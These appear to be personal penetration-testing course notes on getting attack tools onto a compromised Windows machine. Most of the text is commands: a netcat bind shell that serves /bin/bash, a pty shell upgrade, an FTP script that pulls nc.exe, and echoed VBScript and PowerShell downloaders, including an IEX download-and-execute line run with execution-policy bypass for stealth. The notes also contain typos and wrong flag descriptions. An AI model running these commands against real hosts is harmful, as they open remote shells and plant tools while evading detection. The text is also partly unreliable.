Transfering Modules

Dangers of transferring attack tools:

we should try to use the native tools(victim's tools) for detection avoidance,

Installing Pure-FTPd

`` sudo apt update && sudo apt -y install pure-ftpd



groupadd ftpgroup

useradd -g ftpgroup -d /dev/null -s /etc ftpuser

pure-pw useradd offsec -u ftpuser -d /ftphome

pure-pw mkdb

cd /etc/pure-ftpd/auth/

ln -s ../conf/PureDB 60pdb

mkdir -p /ftphome

chown -R ftpuser:ftpgroup /ftphome/

systemctl restart pure-ftpd

non-interactive shell:

nc -lvnp 4444 -e /bin/bash

nc -vn 4444


netcat provides a non-interactive shell.

login to ftp account-> nothing happens(we're interacting in the background)

STDOUT is not correctly redirected in the basic bind or reverse shell.

you have to exit out.


Upgrading non-interactive shell.

python interpreter comes with pty module. we can use this process to spawn fully interactive shell

nc -vn 4444

**python -c 'import ty; pty.spawn("/bin/bash")' **


now we can interact!

Transferring Files with Windows host

Non-interactive FTP download

Assuming we already have a shell on the window's machine,

1. ftp --help

-s:filename specifies a text file containing FTP commands -> we could use this.

the idea is to create a text file with FTP commands in it.

2. in the /ftphome/ directory, place a netcat binary.

3. start the ftp server on kali

sudo systemctl restart pure-ftpd

4. create a text file with echo commands.

-echo open 21 >> ftp.txt

- echo USER offsec>> ftp.txt (USER)

- echo lab>> ftp.txt (PASS)

echo bin >> ftp.txt (binary transfer)

echo GET nc.exe >> ftp.txt

echo bye >> ftp.txt

5. ftp -v -n -s:ftp.txt

-v suppress any return output

-n supress automatic login


echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

copy the window's version of wget to our root

cscript wget.vbs evil.exe this will download a file from our machine. (upload it to the victim's machine)


Remember since we only have a non-interactive shell we cannot start PowerShell.exe, because our shell can't handle that. But we can get around that by creaing a PowerShell-script and then executing the script:

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

Now we invoke it with this crazy syntax: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

-ExecutionPolicy Bypass -noLogo -NonInteractive --- stealthly

powershell -c "(new-object System.Net.WebClient).DownloadFile('')"

IEX(New-Object Net.WebClient).downloadString('')

Transfering files through powershell

1. On kali machine copy whatever you want to send to the web root (/var/www/html/) and start the apache server.

2. Useful scripts are in /usr/share/nishang

2. On the windows machine type the following command:

powershell -c "(new-object System.Net.WebClient).DownloadFile('','C:\Users\Administrator\Desktop\transferme.txt')"

powershell -c "(new-object System.Net.WebClient).DownloadFile('')"

Last updated